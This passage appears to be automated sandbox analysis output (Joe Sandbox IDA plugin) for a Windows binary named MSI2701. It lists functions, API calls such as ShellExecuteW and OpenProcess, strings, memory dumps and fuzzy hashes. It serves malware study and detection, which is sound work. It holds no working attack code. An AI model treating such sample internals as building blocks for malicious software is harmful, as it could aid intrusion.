                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                                            • Opcode ID: e360c8c4f696706fadbb3da83c678894d1d8abb6a59421cedc852586ee405194
                                                                                                                                                            • Instruction ID: cb2aa09406732ffba9b8c2bb56e33e72522641adf07d83548ef0468b81d97f35
                                                                                                                                                            • Opcode Fuzzy Hash: e360c8c4f696706fadbb3da83c678894d1d8abb6a59421cedc852586ee405194
                                                                                                                                                            • Instruction Fuzzy Hash: DEE0D832654189F6D7155B7A9F0FFBF769CD70070BF504152E902D41D1DAE9CA00E165
                                                                                                                                                            Function 004E353F Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0002354B,004E3077), ref: 004E3544
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                            • Opcode ID: 7a0f8f1cccc724d551be29848173fd8c051efcb6f799e83d350b2ec311a9096e
                                                                                                                                                            • Instruction ID: d76774fba1cc635fa9344b08ff20e60c300114331af45721715136df010d4233
                                                                                                                                                            • Opcode Fuzzy Hash: 7a0f8f1cccc724d551be29848173fd8c051efcb6f799e83d350b2ec311a9096e
                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                            Function 004F0A48 Relevance: .7, Instructions: 655COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                            • Opcode ID: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                                                                                                                            • Instruction ID: 1d7427525f3ac43d32c85596020b5aca531b6a138daeeb446a85b2ac30f614f6
                                                                                                                                                            • Opcode Fuzzy Hash: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                                                                                                                            • Instruction Fuzzy Hash: 9432A134A0021ACFCF28CF98C991ABEB7B5EF85304F14416EDE45A7316D635AE46CB94
                                                                                                                                                            Function 004F92A9 Relevance: .6, Instructions: 637COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 88ee0e0cf66d94dcea3b388f133b5dc8d3d0b7e838fd9322d210fc66ccbbec43
                                                                                                                                                            • Instruction ID: d216950fbc25c329b20672c080dc805825c88ff55be2e1fd3a0a0db0b581f8cf
                                                                                                                                                            • Opcode Fuzzy Hash: 88ee0e0cf66d94dcea3b388f133b5dc8d3d0b7e838fd9322d210fc66ccbbec43
                                                                                                                                                            • Instruction Fuzzy Hash: F4321631D29F454DE7239635CD6233AA248AFB73C4F15D727E81AB5AA9EF2CC8835101
                                                                                                                                                            Function 004EA915 Relevance: .4, Instructions: 388COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 68badd1fbe253b0d879d46371f72c2abccb202998fff5d080248fd055400ec9a
                                                                                                                                                            • Instruction ID: ae44092e2a74e64d2cb171db507bcb8d3e4631932f93c720eff15e3c942e904b
                                                                                                                                                            • Opcode Fuzzy Hash: 68badd1fbe253b0d879d46371f72c2abccb202998fff5d080248fd055400ec9a
                                                                                                                                                            • Instruction Fuzzy Hash: 47E1DD706006858FCB24CF6AC580A6BB7F1FF44316B208A5FE5469B391D338BC52CB1A
                                                                                                                                                            Function 004FD8D5 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3471368781-0
                                                                                                                                                            • Opcode ID: 099ddb40c3680d8bc8e5c06ffc85dfacb4b45405e266b0be8acd4b2451084259
                                                                                                                                                            • Instruction ID: af7fb6ead695b3246e1bc5b57dcffad82c643214ff761dd6d22a086e946f1710
                                                                                                                                                            • Opcode Fuzzy Hash: 099ddb40c3680d8bc8e5c06ffc85dfacb4b45405e266b0be8acd4b2451084259
                                                                                                                                                            • Instruction Fuzzy Hash: 86B108759007498BDB34AF25CC82AB7B3AAEF44318F14456FEB43C6680E6B9F941C718
                                                                                                                                                            Function 004EC2CA Relevance: .2, Instructions: 158COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                                                                                                                            • Instruction ID: 616add1f543005d99f16ad70b76089836ffd2373b331d58e83f441f2d08a5c9a
                                                                                                                                                            • Opcode Fuzzy Hash: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                                                                                                                            • Instruction Fuzzy Hash: D6518072E00259AFDF14CF99C981AAEBBB2FF88310F198059E815AB341C7349E51CB95
                                                                                                                                                            Function 004E4920 Relevance: .1, Instructions: 76COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                            • Instruction ID: a2fea97143f9d09f991111fc30c36652d389acba8ef23dc5173227f93abb97d0
                                                                                                                                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                            • Instruction Fuzzy Hash: DC1138F72000C243D604C63FC4B85B7E395EBC6327B2C43ABC082AB75AC22AA941960C
                                                                                                                                                            Function 004FAD78 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                                                                                                            • Instruction ID: f88cb635b2420a4bff4fc68724fbb43bf0e3a8bf1cffaefa8131354b3f5853bf
                                                                                                                                                            • Opcode Fuzzy Hash: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                                                                                                            • Instruction Fuzzy Hash: 0AE08CB291123CEBCB14DB99C90499AF3EDEB84B05B15049BF605D3601C278DE00D7D6
                                                                                                                                                            Function 004F2DCC Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
                                                                                                                                                            • Instruction ID: cc4e3ee19720792a92fa61d17edfbbc4a598f4322ca28d3154e36d2d11f07722
                                                                                                                                                            • Opcode Fuzzy Hash: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
                                                                                                                                                            • Instruction Fuzzy Hash: 4CC08C34002E0846CE2989108BB13FA3355B791782F80058EC6070BB46C55EBC83D605
                                                                                                                                                            Function 004E0116 Relevance: 30.3, APIs: 20, Instructions: 287COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004E011D
                                                                                                                                                            • collate.LIBCPMT ref: 004E0126
                                                                                                                                                              • Part of subcall function 004DEDF2: __EH_prolog3_GS.LIBCMT ref: 004DEDF9
                                                                                                                                                              • Part of subcall function 004DEDF2: __Getcoll.LIBCPMT ref: 004DEE5D
                                                                                                                                                            • __Getcoll.LIBCPMT ref: 004E016C
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E0180
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E0195
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E01D3
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E01E6
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E022C
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E0260
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E031B
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E032E
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E034B
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E0368
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E0385
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E02BD
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • numpunct.LIBCPMT ref: 004E03C4
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E03D4
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E0418
                                                                                                                                                              • Part of subcall function 004C6330: LocalAlloc.KERNEL32(00000040,?,004D0E04,00000020,?,?,004C9942,00000000,C7C71CC4,?,?,?,?,005050DD,000000FF), ref: 004C6336
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E042B
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E0448
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollLockitstd::_$AllocH_prolog3H_prolog3_LocalLockit::_Lockit::~_collatenumpunct
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3717464618-0
                                                                                                                                                            • Opcode ID: a23f9f0cc74a07a5293843708817cc7c290bf73ee134b779f9951eec88b4003a
                                                                                                                                                            • Instruction ID: aa49813a066fb32c6d644a33d816b7388c9d412e29e52be3983f8f1d32dfc963
                                                                                                                                                            • Opcode Fuzzy Hash: a23f9f0cc74a07a5293843708817cc7c290bf73ee134b779f9951eec88b4003a
                                                                                                                                                            • Instruction Fuzzy Hash: 589101719012516BE7607BB78802F7F7AE9EF01325F10442FFC59AB381DABC494082BA
                                                                                                                                                            Function 004C6600 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 319filememoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 004C667E
                                                                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004C66D7
                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004C66E2
                                                                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004C66FE
                                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,005049E5,000000FF), ref: 004C67DB
                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,005049E5,000000FF), ref: 004C67E7
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,005049E5), ref: 004C682F
                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,005049E5,000000FF), ref: 004C684A
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,005049E5), ref: 004C6867
                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,005049E5,000000FF), ref: 004C6891
                                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 004C68D8
                                                                                                                                                            • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 004C692A
                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,005049E5,000000FF), ref: 004C695C
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                                                                                                            • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                                                                                                            • API String ID: 2199533872-3004881174
                                                                                                                                                            • Opcode ID: 1524cf9377db28603cfc2e0146e18223fc11005ec72cf7266bf5432c060c7002
                                                                                                                                                            • Instruction ID: 20bb84e77e44a386ec95ef0b7813a806098920d8b30dfd87233829ab019cc64b
                                                                                                                                                            • Opcode Fuzzy Hash: 1524cf9377db28603cfc2e0146e18223fc11005ec72cf7266bf5432c060c7002
                                                                                                                                                            • Instruction Fuzzy Hash: 69B15775901248AFEB20CF64CC45FEFBBB4AF45704F15812EE504A72C1D7785A09CBA9
                                                                                                                                                            Function 004E2B8C Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0051DD3C,00000FA0,?,?,004E2B6A), ref: 004E2B98
                                                                                                                                                            • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,004E2B6A), ref: 004E2BA3
                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,004E2B6A), ref: 004E2BB4
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004E2BC6
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004E2BD4
                                                                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,004E2B6A), ref: 004E2BF7
                                                                                                                                                            • DeleteCriticalSection.KERNEL32(0051DD3C,00000007,?,?,004E2B6A), ref: 004E2C13
                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,004E2B6A), ref: 004E2C23
                                                                                                                                                            Strings
                                                                                                                                                            • WakeAllConditionVariable, xrefs: 004E2BCC
                                                                                                                                                            • SleepConditionVariableCS, xrefs: 004E2BC0
                                                                                                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 004E2B9E
                                                                                                                                                            • kernel32.dll, xrefs: 004E2BAF
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                                                            • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                            • API String ID: 2565136772-3242537097
                                                                                                                                                            • Opcode ID: 766cd3f5b971c2e8a0325bb361938f783e3ac78406f18174e29679668c574315
                                                                                                                                                            • Instruction ID: 9fa054c6217d015abc5f0648b96dc7dd622b1f0988d33b3c1303fabbb86ef749
                                                                                                                                                            • Opcode Fuzzy Hash: 766cd3f5b971c2e8a0325bb361938f783e3ac78406f18174e29679668c574315
                                                                                                                                                            • Instruction Fuzzy Hash: 0B0196B1E45755ABE6111F66BD0DE6F3B7CBF647427044911BC04D22D0DAB8E804A9B4
                                                                                                                                                            Function 004E5CAF Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • IsInExceptionSpec.LIBVCRUNTIME ref: 004E5DAC
                                                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 004E5DCE
                                                                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 004E5EDD
                                                                                                                                                            • IsInExceptionSpec.LIBVCRUNTIME ref: 004E5FAF
                                                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 004E6033
                                                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 004E604E
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                            • API String ID: 2123188842-393685449
                                                                                                                                                            • Opcode ID: 34112dfceaf5f2a946298bf0c30de744598717b9b72a56d352312d245e59d66e
                                                                                                                                                            • Instruction ID: 8c0084a8a317c2a4bd16360ece6cce181aa2a7896a90077152282fd97528f424
                                                                                                                                                            • Opcode Fuzzy Hash: 34112dfceaf5f2a946298bf0c30de744598717b9b72a56d352312d245e59d66e
                                                                                                                                                            • Instruction Fuzzy Hash: 85B19E71C00689EFCF25DFA6C8809AEB7B5FF1431AF14805BE8156B202D778DA51CB99
                                                                                                                                                            Function 004C4270 Relevance: 15.1, APIs: 10, Instructions: 137timeCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,C7C71CC4,?,?,?), ref: 004C42D2
                                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,C7C71CC4,?,?,?), ref: 004C42F3
                                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,C7C71CC4,?,?,?), ref: 004C4326
                                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,C7C71CC4,?,?,?), ref: 004C4337
                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,C7C71CC4,?,?,?), ref: 004C4355
